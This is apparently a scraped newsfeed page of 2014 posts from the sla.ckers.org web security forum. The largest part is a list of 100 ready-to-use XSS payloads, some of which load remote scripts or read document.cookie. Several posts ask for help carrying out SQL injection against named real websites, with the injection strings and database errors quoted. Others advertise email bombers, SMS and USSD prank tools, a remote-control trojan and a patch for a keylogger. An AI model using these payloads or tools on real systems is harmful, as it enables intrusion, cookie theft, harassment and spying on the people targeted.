sla.ckers.org @ the web & the world :: hundreds of fresh newsfeeds on schuirink.net

news headlines

News headlines collected from 498 newsfeeds.

sla.ckers.org | The Web Application Security Forums

url: http://sla.ckers.org

USSD Sender Hacktool 1.1 (2 replies)

What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly used to make requests to a mobile operator. If
you want to check how much money you have on your mobile SIM card you can use a USSD command for that. Entering, for
example, *#100# on the Vodafone network, you will receive a USSD message as a result.

USSD Sender Hacktool is a complex tool that lets any web user send a text message in a USSD command to any number. By
default the message is "You have been hacked!" but you can send any text. On the target phone a message will pop up
with the text and an OK button. If it goes undelivered, an actual SMS will be sent.


MailChimp Email Bomber 1.0 source (no replies)

This app will send mail to your mailbox. Win the possibility of winning $5.00 dollars by paypal just by sending an email to privateloader@iol.pt



CSRF -- Add extra cookie value (1 reply)

Hello All,
I am trying to demonstrate weak CSRF token implementation.
The request structure is something similar to following:

POST /abc HTTP/1.1

Cookie = JSESSIONID=xxxxxxx ; Token = yyyyyyyy

somename= somevalue
token = yyyyyyyy

The token value is not random and can be easily guessed.

We can control "token=" in POST body but we also need to change "token=" value from Cookies: to make both values identical.

I tried to set an extra cookie parameter using PHP and JS, but that parameter is not getting inserted in the actual CSRF request when the user clicks the submit button.

Any suggestions?

who can bypass this (no replies)

http://ysts.39yst.com/2012/ login have mysql injection

but only get some data,who can bypass this and select into outfile getshell

MySQL Query : SELECT * FROM `pre_ucenter_members` WHERE `username`='1111' AND EXTRACTVALUE(4905,CONCAT(0x5c,0x7161757671,(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),1,50)),0x717a666571)) AND 'YiBx'='YiBx'
MySQL Error : XPATH syntax error: '\qauvq39yst_com_bbs_v2qzfeq'
MySQL Errno : 1105
Message : MySQL Query Error

strange xpath injection unable to get through it (1 reply)


Can any one give it a try .


Looking forward for your kind response.


Free Stuff on the mail (2014) (1 reply)

Get all kind of free stuff directly into your mailbox. No hustles or problems of any kind.
Give a mail worker some jobs


Mobile Prank Hacktool 3.6 - Make Pranks to Any one (no replies)

Mobile Prank Hacktool - A tool to send SMS & Call Pranks to any mobile number.
In version 3.6 you can prank members of the European Parliament



Vulnerable but doesn't work (1 reply)

Hi all,

this URL is vulnerable: (POST)

with data :

i try this :
login=1&action=logue_in&code='||'a'='a&mdp='||1 limit 0,1;#

but I can't connect as a user :( What's wrong?

any idea ?

Mobile Prank Hacktool 3.5 (no replies)



AWeber Email Bomber 1.1 (no replies)

Simple yet effective email bomber that works with all email providers.


USSD Sender Hacktool 1.0 (no replies)

What is USSD?
USSD stands for Unstructured Supplementary Service Data and it's mostly used to make requests to a mobile operator. If you want to check how much money you have on your mobile SIM card you can use a USSD command for that. Entering, for example, *#100# on the Vodafone network, you will receive a USSD message as a result.

USSD Sender Hacktool is a complex tool that lets any web user send a text message in a USSD command to any number. By default the message is "You have been hacked!" but you can send any text. On the target phone a message will pop up with the text and an OK button. If it goes undelivered, an actual SMS will be sent.

The server behind all this is paid so the file is password protected.
Send a private message requesting the password.



RC Trojan 1.2 (1 reply)

RC Trojan, also known as Remote Control Trojan, is an application that permits the control of a computer remotely over a WAN/LAN.

This trojan should be installed in c:\

After extraction/installation, run
c:\RC\Start Server.lnk

And use your browser to access it...



The Art of Exploiting Injection Flaws@ Black hat 2014 (no replies)

Learn advanced techniques in SQL Injection as well as some lesser known injection flaws such as LDAP Injection, Hibernate Query Language Injection, XPATH Injection, XML External Entity Injection, Direct Code injection etc. All attendees will receive FREE access to on-line labs related to the class.


Greetings (1 reply)


I'm having a strange waf issue in id= it does not leting to null the value nor sing via dev 0 .


Looking forward for your kind response.


AWeber Email Bomber 1.0 (no replies)

Send multiple spam emails to any email in the world.


Virustotal: (1/48)

ICEWARP Client Multiple Versions , Persistent Cross Site Scripting (XSS) (no replies)

Check this out ! :D


XCon 2014 Information Security Conference CFP (no replies)

XCon 2014 Information Security Conference
Call for Paper

August, 20th-21st, 2014, Beijing, China (http://xcon.xfocus.org)

Upholding rigorous work style, XCon sincerely welcomes contributions from information security technique enthusiasts and expects your participation and sharing.

Anyone who loves information security, including information security experts and fans, network administrators, network security consultants, CIO, hacker technique fans.

Call For Paper:

Topics Range (but unlimited):
--- New Field Security
- Mobile Devices Security (iOS /Android)
- Mobile Internet
- Cloud Security
- Internet Financial / Mobile Payment
- New Network Attack Technologies
- Windows 8 Defensive Technologies
- OSX System Security Technologies
- CDN Provider Security
- Internet of Things/ Hardware Security
- Big Data
- 3G/4G Security

---Special Network and Devices Security
- Transportation Control and Management Networks
- Terminal Security

--- Application Security
- Industrial Control System
- Routing Devices
- Encryption & Decryption Techniques
- Protocol Security & Exploitation
- Web Application Vulnerability Research
- Application Reverse Engineering and Related Automated Tools
- Database Security & Attacks
- Advanced Trojans, Worms and Backdoor Techniques

--- Intrusion Detection / Forensics Analysis
- APT Attacks
- Firewall Bypass
- Traffic Analysis
- Real-time Data Structure Recovery
- File System Analysis & Recovery
- Intrusion Detection and Anti-detection Techniques
- Reverse Engineering (malicious code analysis technique, vulnerability research)

--- Any topics that will catch the attention of the XCon committee and/or the world.

Paper Submission:
The papers need to include the following information:
1) Brief introduction to the topic and whether the topic had been publicized, and if so, the publicized range.
2) Introduction to yourself.
3) Contact information: full name, alias, nationality, network nickname, e-mail, tel, fax, current working place and company, IM (QQ, MSN, or others).
4) Presentation details:
- How long is the presentation?
- If any new tool/vulnerability/Exploit code will be released
5) The paper needs to include both PPT (for presentation) and WORD (for detailed description) in MS Office or OpenOffice format.

All the papers will be submitted to xcon@huayongxingan.com for preliminary selection. The deadline for submission is on July, 20th, 2014, and the deadline for confirmation is on July, 30th, 2014. No matter if the paper is accepted, we will officially inform you within 7 work days.

Important dates:
* Deadline for submission: July, 20th, 2014
* Deadline for confirmation: July, 30th, 2014

Speakers' privilege:
If your paper is accepted by XCon, you will be invited to give an individual lecture in XCon.
The speakers will be provided with:
- Round-trip plane ticket (Economy class, one person only, foreign speakers up to $1,400)
- Two days' food and accommodation
- Invitation to celebration party
- Sightseeing at some famous places of interest in Beijing, tasting Chinese flavored food
- Lucky draw
- Speakers must provide corresponding invoice or credential.
- XCon owns the right of final explanation about the conference.

For more information about the conference, please contact xcon@huayongxingan.com or professional XCon committee Tel: 086-010-62029792.

Application for Attending:
In order to attend the conference, please register at XCon website (http://xcon.xfocus.org) or directly contact the organizer mentioned above.
We will offer different discounts according to the time of application and payment.
Attendees' food and accommodation will be covered by themselves, and XCon will provide restaurant reservation service.

Other information:
All the information about XCon will be released on XCon website.
Please visit http://xcon.xfocus.org/ for more information about speakers, agenda and previous XCon documents.

Thank you for your support !

xss (1 reply)

100 #XSS Vectors

Below you will find 100 XSS vectors, including 50 new XSS attack vectors. All vectors work like a charm in Chrome :-) I have also specified the browser name alongside in the case of some vectors that do not work in Chrome.

1) <iframe %00 src="	javascript:prompt(1)	"%00>

2) <svg><style>{font-family:'<iframe/onload=confirm(1)>'

3) <input/onmouseover="javaSCRIPT:confirm(1)"

4) <sVg><scRipt %00>alert(1) {Opera}

5) <img/src=`%00` onerror=this.onerror=confirm(1)

6) <form><isindex formaction="javascript:confirm(1)"

7) <img src=`%00`

8) <script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script>

9) <ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?

10) <iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">

11) <script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/

12) "><h1/onmouseover='\u0061lert(1)'>%00

13) <iframe/src="data:text/html,<svg onload=alert(1)>">

14) <meta content="
; JAVASCRIPT: alert(1)" http-equiv="refresh"/>

15) <svg><script xlink:href=data:,window.open('https://www.google.com/')></script

16) <svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}

17) <meta http-equiv="refresh" content="0;url=javascript:confirm(1)">

18) <iframe src=javascript:alert(document.location)>

19) <form><a href="javascript:\u0061lert(1)">X

20) </script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>

21) <img/	
 src=`~` onerror=prompt(1)>

22) <form><iframe 	

23) <a href="data:application/x-x509-user-cert;

24) http://www.google<script .com>alert(document.location)</script

25) <a href=[�]"� onmouseover=prompt(1)//">XYZ</a

26) <img/src=@ 
 onerror = prompt('1')

27) <style/onload=prompt('XSS')

28) <script ^__^>alert(String.fromCharCode(49))</script ^__^

29) </style  ><script   :-(>/**/alert(document.location)/**/</script   :-(

30) �</form><input type="date" onfocus="alert(1)">

31) <form><textarea 

32) <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/

33) <iframe srcdoc='<body onload=prompt(1)>'>

34) <a href="javascript:void(0)" onmouseover=

35) <script ~~~>alert(0%0)</script ~~~>

36) <style/onload=<!--	>

37) <///style///><span %2F onmousemove='alert(1)'>SPAN

38) <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)

39) "><svg><style>{-o-link-source:'<body/onload=confirm(1)>'

 onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}

41) <marquee onstart='javascript:alert(1)'>^__^

42) <div/style="width:expression(confirm(1))">X</div> {IE7}

43) <iframe/%00/ src=javaSCRIPT:alert(1)

44) //<form/action=javascript:alert(document.cookie)><input/type='submit'>//

45) /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>

46) //|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\

47) </font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style>

48) <a/href="javascript:
 javascript:prompt(1)"><input type="X">

49) </plaintext\></|\><plaintext/onmouseover=prompt(1)

50) </svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}

I have already tweeted about the following 50 XSS vectors and so far the paste has more than 1600 hits (http://pastebin.com/mQDbu7Sm)

51) <a href="javascript:\u0061l&#101%72t(1)"><button>

52) <div onmouseover='alert(1)'>DIV</div>

53) <iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)">

54) <a href="jAvAsCrIpT:alert(1)">X</a>

55) <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

56) <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">

57) <var onmouseover="prompt(1)">On Mouse Over</var>

58) <a href=javascript:alert(document.cookie)>Click Here</a>

59) <img src="/" =_=" title="onerror='prompt(1)'">

60) <%<!--'%><script>alert(1);</script -->

61) <script src="data:text/javascript,alert(1)"></script>

62) <iframe/src \/\/onload = prompt(1)

63) <iframe/onreadystatechange=alert(1)

64) <svg/onload=alert(1)

65) <input value=<><iframe/src=javascript:confirm(1)

66) <input type="text" value=`` <div/onmouseover='alert(1)'>X</div>

67) http://www.<script>alert(1)</script .com

68) <iframe src=j

69) <svg><script ?>alert(1)

70) <iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>

71) <img src=`xx:xx`onerror=alert(1)>

72) <object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object>

73) <meta http-equiv="refresh" content="0;javascript:alert(1)"/>

74) <math><a xlink:href="//jsfiddle.net/t846h/">click

75) <embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>

76) <svg contentScriptType=text/vbs><script>MsgBox+1

77) <a href="data:text/html;base64_,<svg/onload=\u0061l&#101%72t(1)>">X</a

78) <iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE>

79) <script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+

80) <script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F

81) <script/src=data:text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/XSS/)></script

82) ject data=javascript:\u0061l&#101%72t(1)><ob

83) <script>+-+-1-+-+alert(1)</script>

84) <body/onload=<!-->&#10alert(1)>

85) <script itworksinallbrowsers>/*<script* */alert(1)</script

86) <img src ?itworksonchrome?\/onerror = alert(1)

87) <svg><script>//
confirm(1);</script </svg>

88) <svg><script onlypossibleinopera:-)> alert(1)

89) <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

90) <script x> alert(1) </script 1=2

91) <div/onmouseover='alert(1)'> style="x:">

92) <--`<img/src=` onerror=alert(1)> --!>

93) <script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,alert(1)></script>

94) <div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>

95) "><img src=x onerror=window.open('https://www.google.com/');>

96) <form><button formaction=javascript:alert(1)>CLICKME

97) <math><a xlink:href="//jsfiddle.net/t846h/">click

98) <object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>

99) <iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe>

100) <a href="data:text/html;blabla,&#60&#115&#99&#114&#105&#112&#116&#32&#115&#114&#99&#61&#34&#104&#116&#116&#112&#58&#47&#47&#115&#116&#101&#114&#110&#101&#102&#97&#109&#105&#108&#121&#46&#110&#101&#116&#47&#102&#111&#111&#46&#106&#115&#34&#62&#60&#47&#115&#99&#114&#105&#112&#116&#62&#8203">Click Me</a>

xss (2 replies)


INSERT INTO in mysql with php - sqlinjection (2 replies)


can u help me .

I want to insert a new password to a database for a "admin" user.
I use the syntax:

insert into members values('admin',,,,'admin@localhost',,,,'','pass','admin','')

but no result returns.

I also use the following syntax:
"select @@version"

and i get a valuable result.

also the mysql version is 5.0.67 .

xss (1 reply)

how to bypass this > and <

pls i need tutorials for CSRF hack (1 reply)

I am a beginner in CSRF exploits, so please, I need any good tutorial for CSRF and iframe


help bypass sqli in search (4 replies)

hey bro
can u help me

how to bypass sqli in this website

http://www.locksupermarket.co.uk/search-result.php?search=1%27 order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50-- -
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27' at line 1


HTTP Traffic (no replies)

For anyone interested in traffic
Here is a piece of crap, still working...



Happy New Year 2014! (2 replies)

Hey everybody,

i wish you all a very Happy New Year 2014!


Tough mod security (2 replies)


This is as far as I go:

http://wargame.balcan-underground.net/vesti.php?id=2 and true
http://wargame.balcan-underground.net/vesti.php?id=2 and false

http://wargame.balcan-underground.net/vesti.php?id=2 group by 1--
http://wargame.balcan-underground.net/vesti.php?id=2 group by 2--

Strange kind of SQL injection (2 replies)

I am trying to hack a site but I get a strange message like this

Warning: sqlite_array_query() [function.sqlite-array-query]

What kind is this?!! SQLite, I didn't hear about it before, and I am trying to find a tutorial for it on this forum but I didn't find anything.

Port #6000 (1 reply)

I scanned a server and I found that port #6000 (X11) is open but access is denied.
I have a question: can I hack it?

I can count the number of columns but I can't get any other data!!! (5 replies)


I tried on this site the command +order+by+1--

and I get that the number of columns is 6, but when I try the command

-9+union+select+1,2,3,4,5,6-- I can get the vulnerable column; then I tried with

the error-based command or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- - and nothing too; also, to check if it's blind, with the command and substring(@@version,1,1)=5 and
and substring(@@version,1,1)=4

but there is no change in the page, but when I do +and+1=0-- the page changed and when I do +and+1=1-- the page becomes normal, so I don't know what kind of SQL error this is; also I tried this site in SQLmap and it is showing me the site is vulnerable and has 6 columns.

I need the help of MR.ajkaro to know the kind of this error and how to execute the command on it.

another question :


this site has error-based SQL and when I give it this command or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- -


I get the version Duplicate entry '5.5.30-cll' for key 'group_key' : select * from yp_gallery_category where cat_id='22' or 1 group by concat_ws(0x00, version(),hex(rand(0))) having min(0)-- -'

but when I try to get the tables I see this


illegal url

and this site too http://www.actualicese.com/tiendavirtual/producto_descontinuado.php?id=85+or+1+group+by+concat_ws%280x7e,%28select+table_name+from+informaion_schema.tables+where+table_schema=database%28%29+limit+0,1%29,floor%28rand%280%29*2%29%29+having+min%280%29--

but I get this

SELECT command denied to user 'ventas_www'@'' for table 'tables'

I tried many filters but it doesn't work, so I need help please.

Volume Patch for SpyCobra (1 reply)

There is a problem in some SpyCobra keylogger software: after install, any time you press a key Windows emits a beep.

I have reported it several times but without luck, even with a new copy, so I built this Volume Patch.

Works on XP/Vista/7/8
Also tested in Server 2003/2008